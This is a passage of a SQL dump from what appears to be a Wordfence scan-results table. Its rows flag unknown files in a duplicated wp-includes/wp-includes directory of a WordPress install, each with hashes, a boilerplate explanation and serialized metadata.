tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-error.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77192,1675048812,1675048812,'new','knownfile',75,'73dfaac430e5389ce19aa21cb3ccc093','3c89c647a7f536ad867b4580f3214688','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-fatal-error-handler.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-fatal-error-handler.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77193,1675048812,1675048812,'new','knownfile',75,'cb32ba686922aead28570c444f509d22','3825911a7c003cbd17b11d3b80a85126','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache-transient.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-feed-cache-transient.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77194,1675048812,1675048812,'new','knownfile',75,'a1482eb6d851c7c84a341a8d4a34b32e','7a6993fe2df1c8272226db50027b579f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-feed-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-feed-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77195,1675048812,1675048812,'new','knownfile',75,'cb0d0db76feb51c8f392f503984e279d','d0763a0fa41399a5eda927724b2b7cb2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-hook.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-hook.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77196,1675048812,1675048812,'new','knownfile',75,'1df4138e7c197bdd2ceb2d992b88fbe7','d434dca383433b046f767b2b4065834e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-cookie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-wp-http-cookie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77197,1675048812,1675048812,'new','knownfile',75,'1bd9cd30a2c749dbe3faf4147e24c41e','8692d85d37d340fcd61b86362d7e29eb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-curl.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-http-curl.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77198,1675048812,1675048812,'new','knownfile',75,'0d6eaa773ad70bbde25df574d17be7dd','5ae357a55508dd40bbfc9090cfc73df2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-encoding.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-encoding.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77199,1675048812,1675048812,'new','knownfile',75,'7d60a1fbe2939696666c55f9a63aede1','6802085a76a4e14cf802ebdad03d4610','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-ixr-client.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-http-ixr-client.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77200,1675048812,1675048812,'new','knownfile',75,'358d3bb8d33493e2edcb23f1869bfbaf','c3b20955ed3c325ba6aa28585e0a9f8c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-proxy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-http-proxy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77201,1675048812,1675048812,'new','knownfile',75,'9d8ee498ebd29ab404626597124d0d19','5498d0fba84822b59a2b21a9970f82b6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-hooks.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-http-requests-hooks.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77202,1675048812,1675048812,'new','knownfile',75,'8bd773b75276d4189831ce0335ee3468','50c856ac6abc78569acc27cffdfbbba2','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-requests-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/class-wp-http-requests-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77203,1675048813,1675048813,'new','knownfile',75,'e10e578616afea32bbdc6962b3cf7d22','bb920d039626bb400e693a0c42af6944','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-http-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77204,1675048813,1675048813,'new','knownfile',75,'b9f717440af28d6ff812df42a65f5993','ea84453fca5aefc70e1bab45bb41dc79','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-http-streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-http-streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77205,1675048813,1675048813,'new','knownfile',75,'df6f77369f69cb13d7cfc63791433c70','41e6e5afcd7dcf6406102fee571b954a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-gd.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-image-editor-gd.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77206,1675048813,1675048813,'new','knownfile',75,'44fb3d39038be6d416fdac2b5a4e425d','442574d7d0e4b389611c71a61a6d5ec6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor-imagick.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/class-wp-image-editor-imagick.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77207,1675048813,1675048813,'new','knownfile',75,'a2aefa53a9c092b8622cbe4327956df8','ed6e8cb6283c9088d90ea9e2c11af901','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-image-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-image-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77208,1675048813,1675048813,'new','knownfile',75,'7ec8959fc438630ed6a7a3707b75c9a8','308a93c32c2cc14d795e3c05f9c19e7b','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-list-util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-list-util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77209,1675048813,1675048813,'new','knownfile',75,'b177d186faa1cd1a769fc76cc06451d9','05d7b9d140b77257170163e20176e757','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale-switcher.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-locale-switcher.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77210,1675048813,1675048813,'new','knownfile',75,'cfde21f414e2ffb424511455234d3987','359979f50d346e43ee57fdee473b7fee','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-locale.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77211,1675048813,1675048813,'new','knownfile',75,'18029643af851ce8e76cfc557bd57ac8','d55f98f9575a5e43c7b1009ea43584d5','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-matchesmapregex.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-matchesmapregex.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77212,1675048813,1675048813,'new','knownfile',75,'725b32d3268994909f36a06733fcd8f4','29691773e1ac8f4d9d7a5d3e5af00000','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-meta-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-meta-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77213,1675048813,1675048813,'new','knownfile',75,'2f3e2950d064508606ebded6ab0a8dcd','c75353afa6242b9b5bffe3f0ba3ad138','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-metadata-lazyloader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-metadata-lazyloader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77214,1675048813,1675048813,'new','knownfile',75,'1ac2f1606a8b2c35a75787452a8db45c','ee49b615e44063af7b82ea4383b23eec','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-network-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77215,1675048813,1675048813,'new','knownfile',75,'e39b949c03a094b9aa8050478be14679','7c064be7e8c72f294bf6591d6e08ac9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77216,1675048813,1675048813,'new','knownfile',75,'63af136bddfabfdc444f53d8e2fb9e09','264c60f61b096a825c349c292dd9f342','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-object-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-object-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77217,1675048813,1675048813,'new','knownfile',75,'64d177550f1712b383c8932cf0b66b89','d5c7bc88ac5bd083aed6a6cb56e01de6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-oembed-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77218,1675048813,1675048813,'new','knownfile',75,'c9f5f41189fb6a850250f842e8e8fe78','a2554eaf99bde245d60369f4b0dc9dc0','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-oembed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77219,1675048814,1675048814,'new','knownfile',75,'3a307568b91c4c6d21d6b720caced651','86ea21b45a531ec807b8774ef4c85931','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-paused-extensions-storage.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-paused-extensions-storage.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77220,1675048814,1675048814,'new','knownfile',75,'1edebb36b535c614d9e7c7c094f19da8','ec56fa728c9cd676a05c14948e3d79c7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-post-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77221,1675048814,1675048814,'new','knownfile',75,'ec6c6d4f3c1555e5a7b967aaa9b1e76b','f2fd3c08867fb69e5953f433ebf9ee9e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77222,1675048814,1675048814,'new','knownfile',75,'348f6eaed8b8199513e32b016e9b9d88','b195805576d759b527638dd78610e9be','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77223,1675048814,1675048814,'new','knownfile',75,'903c7b3f7f609ffe286ad3864d9e9fee','d190b80fa0cefda41c313f7669d269ad','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77224,1675048814,1675048814,'new','knownfile',75,'f7def5bb2a5c2be7e9c5c6405c24980b','b826b84d14531edd49a76d2bb94334df','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-email-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/class-wp-recovery-mode-email-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77225,1675048814,1675048814,'new','knownfile',75,'d6f11c12e3e68c19ee345f6aa843ae46','0640a7a4aac321f5d32276c038f0d8fc','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-key-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-recovery-mode-key-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77226,1675048814,1675048814,'new','knownfile',75,'991e7fd39daaa7012f07c3b34adeb88e','cfbd901aa4b92617376159f8511d9cb3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-link-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/class-wp-recovery-mode-link-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77227,1675048814,1675048814,'new','knownfile',75,'4a38afa8a6ab3dd4e520dda39552fedc','9c9a64813cad99e519804a65d26b6d41','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-recovery-mode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77228,1675048814,1675048814,'new','knownfile',75,'7ea6497f4859a5b1c702aa81632a990b','05396246a9b04cd50be3c20cabe2e20f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77229,1675048814,1675048814,'new','knownfile',75,'7847861f30970cec4b64285c1cdc8424','629319fe02592198cb044faf47be0ac3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-role.php','This file is in a WordPress core location but is 